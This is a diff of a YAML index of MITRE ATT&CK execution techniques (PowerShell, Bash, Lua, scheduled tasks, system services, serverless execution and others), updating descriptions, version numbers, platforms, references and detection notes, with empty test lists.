-        joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+        joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
         AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
         to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
         Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -26180,7 +26501,7 @@ execution:
       - Windows
       - Network
       - SaaS
-      x_mitre_version: '3.0'
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Application Log: Application Log Content'
@@ -26213,12 +26534,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1072
     atomic_tests: []
   T1059.001:
     technique:
-      modified: '2024-03-01T18:01:37.575Z'
+      modified: '2024-10-15T16:39:13.228Z'
       name: 'Command and Scripting Interpreter: PowerShell'
       description: |-
         Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
@@ -26279,8 +26599,9 @@ execution:
           POWERSHELL LOGGING. Retrieved February 16, 2016.
         url: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
       - source_name: Github PSAttack
-        description: Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.
-        url: https://github.com/jaredhaight/PSAttack
+        description: Haight, J. (2016, April 21). PS>Attack. Retrieved September 27,
+          2024.
+        url: https://github.com/Exploit-install/PSAttack-1
       - source_name: inv_ps_attacks
         description: Hastings, M. (2014, July 16). Investigating PowerShell Attacks.
           Retrieved December 1, 2021.
@@ -26302,12 +26623,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.001
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -26385,14 +26705,13 @@ execution:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1059.004:
     technique:
-      modified: '2024-04-16T12:24:40.163Z'
+      modified: '2024-10-15T15:17:19.136Z'
       name: 'Command and Scripting Interpreter: Bash'
       description: |-
         Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
@@ -26450,36 +26769,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.004
     atomic_tests: []
   T1559:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
-      type: attack-pattern
-      created: '2020-02-12T14:08:48.689Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1559
-        url: https://attack.mitre.org/techniques/T1559
-      - source_name: Linux IPC
-        url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
-        description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
-          March 11, 2022.
-      - source_name: Fireeye Hunting COM June 2019
-        url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
-        description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
-          10, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-10T19:06:35.666Z'
       name: Inter-Process Communication
       description: "Adversaries may abuse inter-process communication (IPC) mechanisms
         for local code or command execution. IPC is typically used by processes to
@@ -26500,25 +26794,110 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries,
         or spawned processes that are associated with abuse of IPC mechanisms.
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
       - 'Script: Script Execution'
       - 'Process: Process Access'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      - SYSTEM
       x_mitre_remote_support: true
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
+      created: '2020-02-12T14:08:48.689Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1559
+        external_id: T1559
+      - source_name: Fireeye Hunting COM June 2019
+        description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
+          10, 2019.
+        url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
+      - source_name: Linux IPC
+        description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
+          March 11, 2022.
+        url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1559
     atomic_tests: []
+  T1059.011:
+    technique:
+      modified: '2024-10-01T15:19:54.163Z'
+      name: Lua
+      description: |-
+        Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (<code>.lua</code>), or from Lua-embedded programs (through the <code>struct lua_State</code>).(Citation: Lua main page)(Citation: Lua state)
+
+        Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Script: Script Execution'
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--afddee82-3385-4682-ad90-eeced33f2d07
+      created: '2024-08-05T18:19:42.201Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1059/011
+        external_id: T1059.011
+      - source_name: Kaspersky Lua
+        description: Global Research and Analysis Team. (2016, August 9). The ProjectSauron
+          APT. Retrieved August 5, 2024.
+        url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf
+      - source_name: Lua main page
+        description: Lua. (2024, June 25). Getting started. Retrieved August 5, 2024.
+        url: https://www.lua.org/start.html
+      - source_name: Lua state
+        description: Lua. (n.d.). lua_State. Retrieved August 5, 2024.
+        url: https://pgl.yoyo.org/luai/i/lua_State
+      - source_name: Cyphort EvilBunny
+        description: 'Marschalek, Marion. (2014, December 16). EvilBunny: Malware
+          Instrumented By Lua. Retrieved August 5, 2024.'
+        url: https://web.archive.org/web/20150311013500/http:/www.cyphort.com/evilbunny-malware-instrumented-lua/
+      - source_name: PoetRat Lua
+        description: 'Mercer, Warren. (2020, October 6). PoetRAT: Malware targeting
+          public and private sector in Azerbaijan evolves. Retrieved August 5, 2024.'
+        url: https://blog.talosintelligence.com/poetrat-update/
+      - source_name: Lua Proofpoint Sunseed
+        description: 'Raggi, Michael. Cass, Zydeca. The Proofpoint Threat Research
+          Team.. (2022, March 1). Asylum Ambuscade: State Actor Uses Lua-based Sunseed
+          Malware to Target European Governments and Refugee Movement. Retrieved August
+          5, 2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1204.003:
     technique:
       x_mitre_platforms:
@@ -26547,7 +26926,7 @@ execution:
         url: https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation
         description: Team Nautilus. (2021, June). Attacks in the Wild on the Container
           Supply Chain and Infrastructure. Retrieved August 26, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-26T16:42:35.318Z'
       name: 'User Execution: Malicious Image'
       description: |-
         Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
@@ -26574,30 +26953,12 @@ execution:
       - 'Instance: Instance Creation'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1204.003
     atomic_tests: []
   T1203:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - Windows
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
-      created: '2018-04-18T17:59:24.739Z'
-      x_mitre_version: '1.4'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1203
-        url: https://attack.mitre.org/techniques/T1203
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:34:23.908Z'
+      name: Exploitation for Client Execution
       description: |-
         Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
 
@@ -26614,9 +26975,10 @@ execution:
         ### Common Third-party Applications
 
         Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Exploitation for Client Execution
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Detecting software exploitation may be difficult depending
         on the tools available. Also look for behavior on the endpoint system that
         might indicate successful compromise, such as abnormal behavior of the browser
@@ -26624,21 +26986,37 @@ execution:
         evidence of [Process Injection](https://attack.mitre.org/techniques/T1055)
         for attempts to hide execution, evidence of Discovery, or other unusual network
         traffic that may indicate additional tools transferred to the system.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: execution
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
+      - 'File: File Modification'
       - 'Application Log: Application Log Content'
+      - 'Network Traffic: Network Traffic Flow'
+      x_mitre_remote_support: false
       x_mitre_system_requirements:
       - Remote exploitation for execution requires a remotely accessible service reachable
         over the network or other vector of access such as spearphishing or drive-by
         compromise.
-      x_mitre_remote_support: false
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
+      created: '2018-04-18T17:59:24.739Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1203
+        external_id: T1203
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.006:
     technique:
@@ -26688,28 +27066,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.006
     atomic_tests: []
   T1569:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
-      type: attack-pattern
-      created: '2020-03-10T18:23:06.482Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1569
-        url: https://attack.mitre.org/techniques/T1569
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-20T19:55:40.527Z'
       name: System Services
       description: Adversaries may abuse system services or daemons to execute commands
         or programs. Adversaries can execute malicious content by interacting with
@@ -26720,32 +27081,44 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for command line invocations of tools capable of
         modifying services that doesn’t correspond to normal usage patterns and known
         software, patch cycles, etc. Also monitor for changes to executables and other
         files associated with services. Changes to Windows services may also be reflected
         in the Registry.
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Process: Process Creation'
       - 'Service: Service Creation'
       - 'File: File Modification'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - SYSTEM
-      - root
       x_mitre_remote_support: true
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
+      created: '2020-03-10T18:23:06.482Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1569
+        external_id: T1569
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1059.003:
     technique:
-      modified: '2024-03-01T17:35:02.889Z'
+      modified: '2024-10-15T15:19:56.540Z'
       name: 'Command and Scripting Interpreter: Windows Command Shell'
       description: |-
         Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
@@ -26788,12 +27161,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.003
     atomic_tests: []
   T1651:
     technique:
-      modified: '2024-04-12T03:27:48.171Z'
+      modified: '2024-10-15T13:42:42.543Z'
       name: Cloud Administration Command
       description: |-
         Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)
@@ -26850,11 +27222,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:43:27.104Z'
       name: 'Command and Scripting Interpreter: Visual Basic'
       description: |-
         Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
@@ -26919,14 +27290,13 @@ execution:
         url: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.005
     atomic_tests: []
   T1648:
     technique:
-      modified: '2024-03-05T16:13:38.643Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Serverless Execution
       description: "Adversaries may abuse serverless computing, integration, and automation
         services to execute arbitrary code in cloud environments. Many cloud providers
@@ -26947,14 +27317,19 @@ execution:
         an adversary may create a Lambda function that automatically adds [Additional
         Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user
         and a corresponding CloudWatch events rule that invokes that function whenever
-        a new user is created.(Citation: Backdooring an AWS account) Similarly, an
-        adversary may create a Power Automate workflow in Office 365 environments
-        that forwards all emails a user receives or creates anonymous sharing links
-        whenever a user is granted access to a document in SharePoint.(Citation: Varonis
-        Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)"
+        a new user is created.(Citation: Backdooring an AWS account) This is also
+        possible in many cloud-based office application suites. For example, in Microsoft
+        365 environments, an adversary may create a Power Automate workflow that forwards
+        all emails a user receives or creates anonymous sharing links whenever a user
+        is granted access to a document in SharePoint.(Citation: Varonis Power Automate
+        Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace
+        environments, they may instead create an Apps Script that exfiltrates a user's
+        data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation:
+        OWN-CERT Google App Script 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Shailesh Tiwary (Indian Army)
       - Praetorian
@@ -26963,16 +27338,18 @@ execution:
       - Varonis Threat Labs
       - Alex Soler, AttackIQ
       - Vectra AI
+      - OWN
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       - 'Application Log: Application Log Content'
@@ -26998,6 +27375,14 @@ execution:
         description: Eric Saraga. (2022, February 2). Using Power Automate for Covert
           Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.
         url: https://www.varonis.com/blog/power-automate-data-exfiltration
+      - source_name: Cloud Hack Tricks GWS Apps Script
+        description: HackTricks Cloud. (n.d.). GWS - App Scripts. Retrieved July 1,
+          2024.
+        url: https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts
+      - source_name: OWN-CERT Google App Script 2024
+        description: L'Hutereau Arnaud. (n.d.). Google Workspace Malicious App Script
+          analysis. Retrieved October 2, 2024.
+        url: https://www.own.security/ressources/blog/google-workspace-malicious-app-script-analysis
       - source_name: Cado Security Denonia
         description: 'Matt Muir. (2022, April 6). Cado Discovers Denonia: The First
           Malware Specifically Targeting Lambda. Retrieved May 27, 2022.'
@@ -27012,29 +27397,10 @@ execution:
         url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1204.001:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
-      type: attack-pattern
-      created: '2020-03-11T14:43:31.706Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1204.001
-        url: https://attack.mitre.org/techniques/T1204/001
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-10T16:40:03.786Z'
       name: Malicious Link
       description: An adversary may rely upon a user clicking a malicious link in
         order to gain execution. Users may be subjected to social engineering to get
@@ -27047,25 +27413,41 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
 
         Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
+      created: '2020-03-11T14:43:31.706Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1204/001
+        external_id: T1204.001
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1569.002:
     technique:
-      modified: '2023-08-14T15:53:00.999Z'
+      modified: '2024-10-15T16:41:40.247Z'
       name: 'System Services: Service Execution'
       description: |-
         Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and [Net](https://attack.mitre.org/software/S0039).
@@ -27115,17 +27497,16 @@ execution:
         url: https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1569.002
     atomic_tests: []
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -27188,7 +27569,7 @@ execution:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
